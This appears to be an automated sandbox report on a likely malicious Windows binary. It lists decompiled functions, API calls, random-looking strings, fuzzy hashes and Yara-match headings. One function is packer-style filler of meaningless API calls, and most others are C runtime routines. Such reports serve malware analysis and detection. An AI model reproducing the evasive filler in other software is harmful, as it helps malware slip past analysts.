                                                                                      • String ID: $"$boxodexov rujavivokubecedubew lanokopipematonadofus pitoxabehobowerokinohogaxituk$gewudubudihewujawejurorivujetit$ruvalobibukuzefukeku
                                                                                      • API String ID: 4220119196-1944441969
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E0040199A() {
                                                                                      				long _v8;
                                                                                      				void _v1032;
                                                                                      				short _v3080;
                                                                                      				unsigned int _t5;
                                                                                      				unsigned int _t21;
                                                                                      				unsigned int* _t23;
                                                                                      				unsigned int* _t25;
                                                                                      
                                                                                      				_t23 =  *0x4b3d8c;
                                                                                      				_t5 =  *0x4b8384 >> 3;
                                                                                      				if(_t5 > 0) {
                                                                                      					_t25 = _t23;
                                                                                      					_t21 = _t5;
                                                                                      					do {
                                                                                      						if( *0x4b8384 == 0xae9) {
                                                                                      							GetEnvironmentStringsW();
                                                                                      							__imp__DeactivateActCtx(0, 0);
                                                                                      							ReadConsoleW(0,  &_v1032, 0,  &_v8, 0);
                                                                                      							SetConsoleTitleW(L"mumefere pavegurovi");
                                                                                      							CopyFileW(L"yojepajumoninoxugevotecokuyabapesuwayidamewakejivumatuturoguxowofukojurirotuyumiwim", L"miwipufurudugiciyumenuzujifuhuvutedizocuditejeyimitip", 0);
                                                                                      							GetModuleFileNameW(0,  &_v3080, 0);
                                                                                      							SetConsoleTitleA("kuhidukefub wijobijawimusago zalewijofuhuxukuyepanujonus gohabiraposekenapogakafete calaluneyukuwaxetoyumafotamobi");
                                                                                      							BeginUpdateResourceW(0, 0);
                                                                                      							FreeConsole();
                                                                                      							SetEnvironmentVariableA("darujuwihunuyun zabebedidez zizofokajitaxipogejipubowexo gifitutatopumiduc deguvofagebifut", "cehiwah manamuxezexemuwetesaxuzaduzawor");
                                                                                      							SetConsoleWindowInfo(0, 0, 0);
                                                                                      							EndUpdateResourceA(0, 0);
                                                                                      						}
                                                                                      						_t5 = E004017B1(_t25);
                                                                                      						_t25 = _t25 + 8;
                                                                                      						_t21 = _t21 - 1;
                                                                                      					} while (_t21 != 0);
                                                                                      				}
                                                                                      				return _t5;
                                                                                      			}

                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 004019D2
                                                                                      • DeactivateActCtx.KERNEL32(00000000,00000000), ref: 004019DA
                                                                                      • ReadConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 004019EE
                                                                                      • SetConsoleTitleW.KERNEL32(mumefere pavegurovi), ref: 004019F9
                                                                                      • CopyFileW.KERNEL32(yojepajumoninoxugevotecokuyabapesuwayidamewakejivumatuturoguxowofukojurirotuyumiwim,miwipufurudugiciyumenuzujifuhuvutedizocuditejeyimitip,00000000), ref: 00401A0A
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00401A19
                                                                                      • SetConsoleTitleA.KERNEL32(kuhidukefub wijobijawimusago zalewijofuhuxukuyepanujonus gohabiraposekenapogakafete calaluneyukuwaxetoyumafotamobi), ref: 00401A24
                                                                                      • BeginUpdateResourceW.KERNEL32 ref: 00401A2C
                                                                                      • FreeConsole.KERNEL32 ref: 00401A32
                                                                                      • SetEnvironmentVariableA.KERNEL32(darujuwihunuyun zabebedidez zizofokajitaxipogejipubowexo gifitutatopumiduc deguvofagebifut,cehiwah manamuxezexemuwetesaxuzaduzawor), ref: 00401A42
                                                                                      • SetConsoleWindowInfo.KERNEL32(00000000,00000000,00000000), ref: 00401A4B
                                                                                      • EndUpdateResourceA.KERNEL32 ref: 00401A53
                                                                                      Strings
                                                                                      • cehiwah manamuxezexemuwetesaxuzaduzawor, xrefs: 00401A38
                                                                                      • yojepajumoninoxugevotecokuyabapesuwayidamewakejivumatuturoguxowofukojurirotuyumiwim, xrefs: 00401A05
                                                                                      • darujuwihunuyun zabebedidez zizofokajitaxipogejipubowexo gifitutatopumiduc deguvofagebifut, xrefs: 00401A3D
                                                                                      • miwipufurudugiciyumenuzujifuhuvutedizocuditejeyimitip, xrefs: 00401A00
                                                                                      • mumefere pavegurovi, xrefs: 004019F4
                                                                                      • kuhidukefub wijobijawimusago zalewijofuhuxukuyepanujonus gohabiraposekenapogakafete calaluneyukuwaxetoyumafotamobi, xrefs: 00401A1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Console$EnvironmentFileResourceTitleUpdate$BeginCopyDeactivateFreeInfoModuleNameReadStringsVariableWindow
                                                                                      • String ID: cehiwah manamuxezexemuwetesaxuzaduzawor$darujuwihunuyun zabebedidez zizofokajitaxipogejipubowexo gifitutatopumiduc deguvofagebifut$kuhidukefub wijobijawimusago zalewijofuhuxukuyepanujonus gohabiraposekenapogakafete calaluneyukuwaxetoyumafotamobi$miwipufurudugiciyumenuzujifuhuvutedizocuditejeyimitip$mumefere pavegurovi$yojepajumoninoxugevotecokuyabapesuwayidamewakejivumatuturoguxowofukojurirotuyumiwim
                                                                                      • API String ID: 1369361980-2361986252
                                                                                      • Opcode ID: 1c68e81394502959ea048a51dd9680f3b731cc7d1b60ad2155ccdd28c7028877
                                                                                      • Instruction ID: 6e208b578b296d1895d65409d91f6f58629e917ce2b34d303741641d72c6da78
                                                                                      • Opcode Fuzzy Hash: 1c68e81394502959ea048a51dd9680f3b731cc7d1b60ad2155ccdd28c7028877
                                                                                      • Instruction Fuzzy Hash: 97116AB320A524FBC3206BA4AD4CD9F3F6CEF4B7517000126F606D2160DA784A01CBBD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040367F(short* _a4, int _a8, intOrPtr _a12, char* _a16, char _a20) {
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				char _t35;
                                                                                      				int _t36;
                                                                                      				char _t37;
                                                                                      				char _t40;
                                                                                      				signed int _t46;
                                                                                      				void* _t48;
                                                                                      				void* _t49;
                                                                                      				char _t54;
                                                                                      				void* _t56;
                                                                                      				void* _t60;
                                                                                      				char _t63;
                                                                                      				signed short* _t64;
                                                                                      				short* _t66;
                                                                                      				char _t67;
                                                                                      				void* _t78;
                                                                                      				char* _t79;
                                                                                      				void* _t80;
                                                                                      				char _t81;
                                                                                      				char* _t82;
                                                                                      
                                                                                      				_t79 = _a8;
                                                                                      				if(_t79 == 0 || _a12 == 0) {
                                                                                      					L5:
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					if( *_t79 != 0) {
                                                                                      						_t35 = _a20;
                                                                                      						__eflags = _t35;
                                                                                      						if(__eflags != 0) {
                                                                                      							_t81 =  *_t35;
                                                                                      							_t36 =  *((intOrPtr*)(_t35 + 4));
                                                                                      						} else {
                                                                                      							_t81 =  *(E00404B55(_t78, _t79, _t80, __eflags) + 8);
                                                                                      							_t36 = E00404B2F(_t78, _t79, _t81, __eflags);
                                                                                      						}
                                                                                      						_a8 = _t36;
                                                                                      						__eflags = _t81;
                                                                                      						if(_t81 != 0) {
                                                                                      							_t37 = E00403591(_a8);
                                                                                      							_t82 = _a16;
                                                                                      							__eflags =  *_t82;
                                                                                      							_t67 = _t37;
                                                                                      							if( *_t82 == 0) {
                                                                                      								__eflags = _t67;
                                                                                      								if(__eflags != 0) {
                                                                                      									_t40 =  *( *((intOrPtr*)(_t67 + 4)) + ( *_t79 & 0x000000ff) + 0x1d) & 4;
                                                                                      									__eflags = _t40;
                                                                                      								} else {
                                                                                      									_t40 =  *(E004067D8(_t78, _t79, _t82, __eflags) + ( *_t79 & 0x000000ff) * 2) & 0x8000;
                                                                                      								}
                                                                                      								__eflags = _t40;
                                                                                      								if(_t40 == 0) {
                                                                                      									__eflags = _a4;
                                                                                      									__eflags = MultiByteToWideChar(_a8, 9, _t79, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                      									if(__eflags != 0) {
                                                                                      										goto L13;
                                                                                      									}
                                                                                      									goto L20;
                                                                                      								} else {
                                                                                      									_t48 = E00404B13(_t78, _t79, _t82, _t67);
                                                                                      									__eflags = _a12 - _t48;
                                                                                      									if(_a12 >= _t48) {
                                                                                      										_t49 = E00404B13(_t78, _t79, _t82, _t67);
                                                                                      										__eflags = _t49 - 1;
                                                                                      										if(_t49 <= 1) {
                                                                                      											L29:
                                                                                      											__eflags = _t79[1];
                                                                                      											if(_t79[1] != 0) {
                                                                                      												L18:
                                                                                      												return E00404B13(_t78, _t79, _t82, _t67);
                                                                                      											}
                                                                                      											L19:
                                                                                      											 *_t82 =  *_t82 & 0x00000000;
                                                                                      											__eflags =  *_t82;
                                                                                      											L20:
                                                                                      											_t46 = E004046FF(__eflags);
                                                                                      											 *_t46 = 0x2a;
                                                                                      											return _t46 | 0xffffffff;
                                                                                      										}
                                                                                      										__eflags = _a4;
                                                                                      										_t54 = MultiByteToWideChar(_a8, 9, _t79, E00404B13(_t78, _t79, _t82, _t67), _a4, 0 | _a4 != 0x00000000);
                                                                                      										__eflags = _t54;
                                                                                      										if(_t54 != 0) {
                                                                                      											goto L18;
                                                                                      										}
                                                                                      										goto L29;
                                                                                      									}
                                                                                      									 *_t82 =  *_t79;
                                                                                      									_t56 = 0xfffffffe;
                                                                                      									return _t56;
                                                                                      								}
                                                                                      							}
                                                                                      							_t82[1] =  *_t79;
                                                                                      							_t60 = E00404B13(_t78, _t79, _t82, _t67);
                                                                                      							__eflags = _t60 - 1;
                                                                                      							if(_t60 <= 1) {
                                                                                      								goto L19;
                                                                                      							}
                                                                                      							__eflags = _a4;
                                                                                      							_t63 = MultiByteToWideChar(_a8, 9, _t82, 2, _a4, 0 | _a4 != 0x00000000);
                                                                                      							__eflags = _t63;
                                                                                      							if(_t63 == 0) {
                                                                                      								goto L19;
                                                                                      							}
                                                                                      							 *_t82 =  *_t82 & 0x00000000;
                                                                                      							__eflags =  *_t82;
                                                                                      							goto L18;
                                                                                      						} else {
                                                                                      							_t64 = _a4;
                                                                                      							__eflags = _t64;
                                                                                      							if(_t64 != 0) {
                                                                                      								 *_t64 =  *_t79 & 0x000000ff;
                                                                                      							}
                                                                                      							L13:
                                                                                      							return 1;
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t66 = _a4;
                                                                                      						if(_t66 != 0) {
                                                                                      							 *_t66 = 0;
                                                                                      						}
                                                                                      						goto L5;
                                                                                      					}
                                                                                      				}
                                                                                      			}
                                                                                      0x00000000
                                                                                      0x00403723
                                                                                      0x00403723
                                                                                      0x00000000
                                                                                      0x004036ce
                                                                                      0x004036ce
                                                                                      0x004036d1
                                                                                      0x004036d3
                                                                                      0x004036d9
                                                                                      0x004036d9
                                                                                      0x004036dc
                                                                                      0x00000000
                                                                                      0x004036de
                                                                                      0x00403699
                                                                                      0x00403699
                                                                                      0x0040369e
                                                                                      0x004036a2
                                                                                      0x004036a2
                                                                                      0x00000000
                                                                                      0x0040369e
                                                                                      0x00403697

APIs
• ____lc_handle_func.LIBCMT ref: 004036B3
• ____lc_codepage_func.LIBCMT ref: 004036BB
• __GetLocaleForCP.LIBCPMT ref: 004036E4
• ____mb_cur_max_l_func.LIBCMT ref: 004036FA
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000002,00000000,00000000,?,?,?,?,0040150C,?,00000000,00000001,00000000), ref: 00403719
• ____mb_cur_max_l_func.LIBCMT ref: 00403727
• ___pctype_func.LIBCMT ref: 0040374C
• ____mb_cur_max_l_func.LIBCMT ref: 00403772
• ____mb_cur_max_l_func.LIBCMT ref: 0040378A
• ____mb_cur_max_l_func.LIBCMT ref: 004037A2
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,?,?,?,?,0040150C,?,00000000,00000001,00000000), ref: 004037AF
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,?,0040150C,?,00000000,00000001,00000000), ref: 004037E0
Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID: ____mb_cur_max_l_func$ByteCharMultiWide$Locale____lc_codepage_func____lc_handle_func___pctype_func
• String ID:
• API String ID: 3819326198-0
• Opcode ID: bc94c71d8c355d7ecd8b4f29cd2be4feeb68a8d9ec85e0561b8b2979178fd18b
• Instruction ID: 1c910f71532857991ef8d43e2eba7a8eaac3bfd14d9f113ff2bc86205083895e
• Opcode Fuzzy Hash: bc94c71d8c355d7ecd8b4f29cd2be4feeb68a8d9ec85e0561b8b2979178fd18b
• Instruction Fuzzy Hash: 7B41E4B1204245BEDB305F21C840B2A3FACAF41316F14883BF955AB2D2E73DDA50DB69
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: Exception@8Throw$_memset$_malloc_sprintf
• String ID: ^u
• API String ID: 65388428-3277548187
• Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
• Instruction ID: a116ad4e80f652eaacba670b24988de1a284e6d7724a0721b1b57481c0645cd3
• Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
• Instruction Fuzzy Hash: A9515A71D40219ABDF11DBA5DC8AFEFBBB8FB04B45F100025F905F6181E774AA058BA6
Uniqueness

Uniqueness Score: -1.00%

APIs
• _memset.LIBCMT ref: 00863F51
  • Part of subcall function 00865BA8: __getptd_noexit.LIBCMT ref: 00865BA8
• __gmtime64_s.LIBCMT ref: 00863FEA
• __gmtime64_s.LIBCMT ref: 00864020
• __gmtime64_s.LIBCMT ref: 0086403D
• __allrem.LIBCMT ref: 00864093
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008640AF
• __allrem.LIBCMT ref: 008640C6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008640E4
• __allrem.LIBCMT ref: 008640FB
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00864119
• __invoke_watson.LIBCMT ref: 0086418A
Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
• Instruction ID: c8f0d68c9134b25fad432afd37a9fed9016bdb7688d1ccb1124e84cc128cba20
• Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
• Instruction Fuzzy Hash: 8C71C672A00B16ABE7149E7DCC41B6EB3B9FF11364F158229F514E7682EB70DE408B91
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: _free$ExitProcess___crt
• String ID:
• API String ID: 1022109855-0
• Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
• Instruction ID: 7602314aee898abf9e92d21bdf67ce6e32cd6f313753b4a6e017384ab395464c
• Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
• Instruction Fuzzy Hash: CB318431900260DBCF616F58FC8D84977A4FB5432070A862AF91ADB2B1CFB45DC99F95
Uniqueness

Uniqueness Score: -1.00%

APIs
• std::exception::exception.LIBCMT ref: 0088FC1F
• __CxxThrowException@8.LIBCMT ref: 0088FC34
• std::exception::exception.LIBCMT ref: 0088FC4D
• __CxxThrowException@8.LIBCMT ref: 0088FC62
• std::regex_error::regex_error.LIBCPMT ref: 0088FC74
  • Part of subcall function 0088F914: std::exception::exception.LIBCMT ref: 0088F92E
• __CxxThrowException@8.LIBCMT ref: 0088FC82
• std::exception::exception.LIBCMT ref: 0088FC9B
• __CxxThrowException@8.LIBCMT ref: 0088FCB0
Strings
Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: Exception@8Throwstd::exception::exception$std::regex_error::regex_error
• String ID: leM
• API String ID: 2862078307-2926266777
• Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
• Instruction ID: 72d2a0c9796463da3b5ac2e4e04cf277196311f2b76936a0db236e888b9207ff
• Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
• Instruction Fuzzy Hash: 78119979C0020DBBCF00FFA9D859CDDBB78FA14744B40C566B92897646EB74E3488B96
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
E0040621F(void* __ebx, intOrPtr _a4, intOrPtr _a8) {
    void* __edi;
    void* __esi;
    void* __ebp;
    intOrPtr _t13;
    intOrPtr _t14;
    intOrPtr _t17;
    void* _t43;
    intOrPtr _t48;   /* used below, declaration was missing from the listing */
    intOrPtr* _t51;
    intOrPtr* _t57;  /* used below, declaration was missing from the listing */

    /* Argument check: first argument above 5 or second argument zero -> return 0. */
    if(_a4 > 5 || _a8 == 0) {
        L4:
        return 0;
    } else {
        /* E0040673E is __calloc_crt (APIs list, ref 00406238): 8-byte block holding two pointers */
        _t51 = E0040673E(8, 1);
        _t57 = _t51;
        if(_t51 != 0) {
            /* second __calloc_crt (ref 0040625C): 0xd8-byte block stored at _t51[0] */
            _t13 = E0040673E(0xd8, 1);
            *_t51 = _t13;
            __eflags = _t13;
            if(__eflags != 0) {
                /* third __calloc_crt (ref 00406278): 0x220-byte block stored at _t51[1] */
                _t14 = E0040673E(0x220, 1);
                *((intOrPtr*)(_t51 + 4)) = _t14;
                __eflags = _t14;
                if(__eflags != 0) {
                    /* E0040558F is __copytlocinfo_nolock (ref 0040629D), E00406004 is __setlocale_nolock (ref 004062AA) */
                    E0040558F( *_t51, 0x4adca8);
                    _t48 = *_t51;
                    _t17 = E00406004(_a8, *_t51, _a4);
                    _pop(_t43);
                    __eflags = _t17;
                    if(__eflags != 0) {
                        __eflags = E00409EEB(_t43, _t48, __eflags, *((intOrPtr*)( *_t51 + 4)), *((intOrPtr*)(_t51 + 4)));
                        if(__eflags == 0) {
                            /* success: mark the 0x220-byte block and return the 8-byte block */
                            *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
                            *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
                            L17:
                            return _t51;
                        }
                        /* failure: release the three blocks in reverse order, return 0 */
                        _push( *((intOrPtr*)(_t51 + 4)));
                        E00403B26(__ebx, 1, _t51, __eflags);
                        E004054F6( *_t51);
                        E0040531E( *_t51);
                        _push(_t51);
                        E00403B26(__ebx, 1, _t51, __eflags);
                        L15:
                        _t51 = 0;
                        goto L17;
                    }
                    E004054F6( *_t51);
                    E0040531E( *_t51);
                    _push(_t51);
                    E00403B26(__ebx, 1, _t51, __eflags);
                    goto L15;
                }
                _push( *_t51);
                E00403B26(__ebx, 1, _t51, __eflags);
                _push(_t51);
                E00403B26(__ebx, 1, _t51, __eflags);
                L8:
                goto L3;
            }
            _push(_t51);
            E00403B26(__ebx, 1, _t51, __eflags);
            goto L8;
        }
        L3:
        /* allocation failure path: 0xc is ENOMEM; E004046FF is presumably the CRT errno accessor (assumption) */
        *((intOrPtr*)(E004046FF(_t57))) = 0xc;
        goto L4;
    }
}


                                                                                      APIs
                                                                                      • __calloc_crt.LIBCMT ref: 00406238
                                                                                        • Part of subcall function 0040673E: __calloc_impl.LIBCMT ref: 0040674F
                                                                                        • Part of subcall function 0040673E: Sleep.KERNEL32(00000000,00408C13,00000001,00000214), ref: 00406766
                                                                                      • __calloc_crt.LIBCMT ref: 0040625C
                                                                                      • __calloc_crt.LIBCMT ref: 00406278
                                                                                      • __copytlocinfo_nolock.LIBCMT ref: 0040629D
                                                                                      • __setlocale_nolock.LIBCMT ref: 004062AA
                                                                                      • ___removelocaleref.LIBCMT ref: 004062B6
                                                                                      • ___freetlocinfo.LIBCMT ref: 004062BD
                                                                                      • __setmbcp_nolock.LIBCMT ref: 004062D5
                                                                                      • ___removelocaleref.LIBCMT ref: 004062EA
                                                                                      • ___freetlocinfo.LIBCMT ref: 004062F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                      • String ID:
                                                                                      • API String ID: 2969281212-0
                                                                                      • Opcode ID: 99ebfd3b9a8afe4d43bd39479b6be3d77510632868e91a45af5ba62b84b4e5fd
                                                                                      • Instruction ID: df51420e26ef1d63d49dce8e102a6bad4d036a5b691a5c77db06d49c7349e125
                                                                                      • Opcode Fuzzy Hash: 99ebfd3b9a8afe4d43bd39479b6be3d77510632868e91a45af5ba62b84b4e5fd
                                                                                      • Instruction Fuzzy Hash: 7A210631104501AAE7317F2AD802E1B7BE5DF81768B22403FF886762D2DE399920DA5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free_malloc_wprintf$_sprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3721157643-0
                                                                                      • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                      • Instruction ID: e9a2529090696fa79b9b25889019aebb5e30cc8d7726f2b61091c70792384831
                                                                                      • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                      • Instruction Fuzzy Hash: 6A113AB65009643AC661A3B94C16FFF7BDCEF85702F0800BAFB5DD5183DA185A0493B2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 217217746-3277548187
                                                                                      • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction ID: 50152bc14c2b8763035f6ca3dc8670079f38d6a838e941eea9ad3b3647c5d508
                                                                                      • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction Fuzzy Hash: ED515CB194020DAADF11DFA5DC46FEEBB78FB04704F104039FA05F6282D7B5AA058BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 217217746-3277548187
                                                                                      • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction ID: 5f85adee2abf1f7ed6b311cb6fe5f54fd0ca8f2245ac811ad32d30910d10edca
                                                                                      • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction Fuzzy Hash: DC518E71D40209AADF11DFA5CC46FEFBBB8FB04704F100039FA15F6181EA74AA058BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 97%
                                                                                      			E00402BBD(intOrPtr* __ecx, void* __edx) {
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				intOrPtr _t28;
                                                                                      				void* _t37;
                                                                                      				signed int _t41;
                                                                                      				intOrPtr _t47;
                                                                                      				void* _t57;
                                                                                      				intOrPtr* _t59;
                                                                                      				signed int _t63;
                                                                                      				intOrPtr _t64;
                                                                                      				void* _t66;
                                                                                      				signed int _t71;
                                                                                      				signed int _t72;
                                                                                      
                                                                                      				_t57 = __edx;
                                                                                      				E004A6CC8(E004A6EFE, _t66);
                                                                                      				_t59 = __ecx;
                                                                                      				E00403200(_t66 - 0x18, 0);
                                                                                      				 *(_t66 - 4) = 0;
                                                                                      				 *((intOrPtr*)(_t66 - 0x10)) =  *0x4b838c;
                                                                                      				_t71 =  *0x4af658; // 0x0
                                                                                      				if(_t71 != 0) {
                                                                                      					L4:
                                                                                      					_t63 =  *0x4af658; // 0x0
                                                                                      					_t28 =  *_t59;
                                                                                      					if(_t63 >=  *((intOrPtr*)(_t28 + 0xc))) {
                                                                                      						_t47 = 0;
                                                                                      					} else {
                                                                                      						_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + _t63 * 4));
                                                                                      					}
                                                                                      					if(_t47 != 0 ||  *((intOrPtr*)(_t28 + 0x14)) == 0) {
                                                                                      						_t64 = _t47;
                                                                                      					} else {
                                                                                      						_t37 = E00402EDE();
                                                                                      						if(_t63 >=  *((intOrPtr*)(_t37 + 0xc))) {
                                                                                      							_t64 = 0;
                                                                                      						} else {
                                                                                      							_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t37 + 8)) + _t63 * 4));
                                                                                      						}
                                                                                      					}
                                                                                      					if(_t64 == 0) {
                                                                                      						_t64 =  *((intOrPtr*)(_t66 - 0x10));
                                                                                      						if(_t64 == 0) {
                                                                                      							_push(_t59);
                                                                                      							if(E004012EB(0, _t57, _t66 - 0x10) == 0xffffffff) {
                                                                                      								E00403A98(_t66 - 0x24, "bad cast");
                                                                                      								E004052D2(_t66 - 0x24, 0x4abbc8);
                                                                                      							}
                                                                                      							_t64 =  *((intOrPtr*)(_t66 - 0x10));
                                                                                      							 *0x4b838c = _t64;
                                                                                      							E004011D6(_t64);
                                                                                      							E00402FA3(_t57, _t64);
                                                                                      						}
                                                                                      					}
                                                                                      					 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                                                                                      					E00403228(_t66 - 0x18);
                                                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
                                                                                      					return _t64;
                                                                                      				}
                                                                                      				E00403200(_t66 - 0x14, 0);
                                                                                      				_t72 =  *0x4af658; // 0x0
                                                                                      				if(_t72 == 0) {
                                                                                      					 *0x4af64c =  *0x4af64c + 1;
                                                                                      					_t41 =  *0x4af64c; // 0x0
                                                                                      					 *0x4af658 = _t41;
                                                                                      				}
                                                                                      				E00403228(_t66 - 0x14);
                                                                                      				goto L4;
                                                                                      			}


                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00402BC2
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00402BD5
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00402BF1
                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 00402C70
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00402C7E
                                                                                      • std::locale::facet::_Incref.LIBCPMT ref: 00402C8E
                                                                                      • std::locale::facet::facet_Register.LIBCPMT ref: 00402C94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
